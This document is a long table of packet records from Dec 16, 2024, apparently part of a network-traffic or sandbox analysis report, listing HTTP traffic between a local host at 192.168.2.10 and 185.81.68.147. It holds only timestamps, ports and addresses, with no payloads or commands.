                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.887789011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.887859106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.888513088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.888592005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.888684988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.889389038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.889405966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.889472961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.890247107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.890263081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.890328884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.890785933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.890866995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.890881062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.934084892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.025322914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.025357962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.025574923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.025655031 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.025660038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.025743961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.026525974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.026592016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.026808977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.027394056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.027455091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.027559996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.028256893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.028373003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.028477907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.029119968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.029218912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.029323101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.030149937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.030241013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.030349016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.030944109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.030987978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.031094074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.031786919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.031917095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.032025099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.032684088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.032782078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.032890081 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.033479929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.033586025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.033687115 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.034451962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.034653902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.034761906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.035428047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.035557985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.035660028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.036247015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.036317110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.036417961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.036962032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.037045956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.037194014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.037878036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.037986994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.038095951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.038736105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.038886070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.038990974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.039693117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.039879084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.039978981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.040497065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.040642023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.040741920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.041354895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.041492939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.041594982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.042403936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.042524099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.042623997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.043178082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.043234110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.043346882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.044012070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.044117928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.044217110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.044892073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.044986010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.045084000 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.045743942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.045866966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.045964956 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.046631098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.046761036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.046860933 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.047499895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.047595024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.047689915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.048433065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.048508883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.048609018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.049247980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.049304962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.049407005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.050400972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.050518990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.050622940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.051152945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.051209927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.051305056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.051902056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.052025080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.052122116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.052774906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.052930117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.053029060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.053687096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.053776026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.053874016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.054533958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.054647923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.054750919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.055500031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.055594921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.055696964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.056319952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.056343079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.056462049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.057207108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.057287931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.057390928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.058037043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.058211088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.058310986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.058918953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.059050083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.059155941 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.059784889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.059871912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.059973001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.060648918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.060780048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.060883999 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.061553955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.061667919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.061770916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.062453032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.062751055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.062853098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.063285112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.063399076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.063498974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.064174891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.064286947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.064385891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.065021038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.078533888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.078622103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.078641891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.079020977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.079098940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.079103947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.079843044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.079924107 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.079963923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.080693007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.080749989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.080775976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.081593990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.081680059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.081717968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.082508087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.082602024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.082607985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.083437920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.083451986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.083604097 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.217633963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.217730045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.217842102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.217988968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.218082905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.218179941 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.218862057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.218955994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.219054937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.219738960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.219835043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.220603943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.220696926 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.220736980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.220896959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.221548080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.221568108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.221668005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.222554922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.222773075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.222862959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.223243952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.223388910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.223486900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.224147081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.224226952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.224802971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.224994898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.225100994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.225209951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.225905895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.226073980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.226196051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.226811886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.226913929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.227034092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.227622032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.227718115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.227816105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.228504896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.228526115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.228634119 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.229562044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.229665041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.230267048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.230293989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.230417013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.230515957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.231118917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.231240034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.231348991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.232001066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.232316971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.232428074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.232884884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.233000040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.233158112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.233967066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.234045982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.234134912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.234664917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.234776020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.234857082 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.235523939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.235646009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.235728979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.236385107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.236489058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.236588001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.237253904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.237370014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.237482071 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.238178015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.238261938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.238372087 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.239013910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.239079952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.239171982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.239893913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.240003109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.240096092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.240770102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.240881920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.241070032 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.241647005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.241708994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.241789103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.242530107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.242652893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.242731094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.243396044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.243515968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.243611097 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.244273901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.244338036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.244421959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.245160103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.245317936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.245423079 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.246049881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.246121883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.246213913 CET4972380192.168.2.10185.81.68.147
